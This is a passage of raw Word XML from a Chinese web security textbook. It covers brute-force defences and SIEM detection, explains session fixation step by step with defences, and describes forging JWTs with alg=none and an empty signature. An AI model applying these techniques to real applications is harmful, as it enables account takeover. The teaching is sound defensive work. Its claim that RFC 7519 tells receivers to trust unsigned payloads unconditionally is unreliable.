            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">或账户的登录频次限制（如每分钟最多</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 5 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">次失败尝试），超过阈值触发延迟应答或临时禁入。始终从服务端实现，不依赖客户端的“disable</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> button”。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">账户锁定（Account</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Lockout）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">连续</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> N </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">次失败后锁定账户，或采用缓慢的渐进锁定以降低</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> DoS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">风险（攻击者可能恶意锁定大量用户）。应区分用户锁定（需要管理员干预）与时间窗口锁定（自动解封）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">多因素认证（MFA）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">将认证因子从“你知道什么”扩充到“你拥有什么”或“你是什么”，即便口令被猜中，攻击者仍无法提供第二因子。NIST</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> SP 800-63B </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">已明确建议使用</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> MFA </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">且避免使用</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> SMS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">作为唯一第二因子。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">蓝队检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">在</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> SIEM </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">中配置规则：同一源</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">对</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/login</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">端点的异常高频请求、对多用户名顺序尝试、User-Agent</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">头异常的爆破流量。Web</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">服务器访问日志的</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 401 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">状态码的突增也是关键信号。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="196"/>
    <w:bookmarkStart w:id="197" w:name="会话安全假设固定与劫持"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话安全假设：固定与劫持</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">口令与密码的爆破解决的是“如何冒充合法用户出示首次凭证”。但如果攻击者能够让受害者直接使用一个攻击者已知的会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录，那么攻击者连口令都不需要猜——这就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">会话固定（Session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fixation）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。其前提是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用在认证前后没有轮换</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID，且接受外部指定的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID（例如通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?PHPSESSID=...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POST body </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">投递）。攻击流程如下：攻击者先在自身浏览器中获得一个有效</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;FIXED_SID&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），之后通过社工或反射式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS/CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">植入受害者的请求中；当受害者使用该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录后，服务端将用户的已认证身份与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;FIXED_SID&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">绑定；此刻攻击者通过同一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;FIXED_SID&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">即可直接冒充受害者而不需输入任何密码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这一攻击之所以成立，根本原因在于违反了会话管理的核心安全假设：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">会话令牌必须在认证事件发生时刻改变其值（nonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">属性），确保认证前的匿名会话与认证后的受信会话不可桥接</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。OWASP Testing Guide </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在“Session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Management </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing”章节中将对固定攻击的检测列为标准项：测试人员使用工具（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Suite）先获取一个匿名会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID，随后通过同样的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">但附上目标用户凭证进行认证，最后用原始匿名会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重新访问受保护页面——如果此时已经可以直接进入认证状态，则表明</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">未被轮换，应用存在固定风险。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从防御角度出发，安全会话管理的基本动作包括：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录成功后立即生成新的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并使旧</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">失效；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">拒绝接受</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数传入的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">session.use_trans_sid = 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的对应配置项</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属性——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防止脚本直接读取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">值（缓解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">窃取），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite=Lax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Strict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">极大压缩</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的可行性（见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设置合理的会话过期时间和空闲超时。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="197"/>
    <w:bookmarkStart w:id="198" w:name="jwt-常见误用algnone-与弱签名"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">常见误用：alg=none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与弱签名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT（JSON</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Token）在当下</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证中被广泛采用，其格式为三段</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Base64URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编码的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">header.payload.signature</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的安全基石是签名：服务器信任</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的内容，仅仅因为它通过了签名校验。这一信任假设在两种典型的误用下彻底崩解。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第一类也是最著名的误用是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">alg: "none"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">算法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标准</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RFC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">7519（①）规定，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">alg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头参数指示签名算法，当值为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时，数据段不应被签名，接收方应无条件信任</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload。这个选项本用于已通过外部手段（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的完整性保护）保护</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的部署场景；然而若服务端代码在处理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时未强制声明允许的算法白名单，攻击者完全可以发送一个由自己任意构造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">组成的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">token，将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> header </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">alg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">置为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，并令</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> signature </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">段为空串。如果服务端使用了“容忍式”JWT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">库（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PyJWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
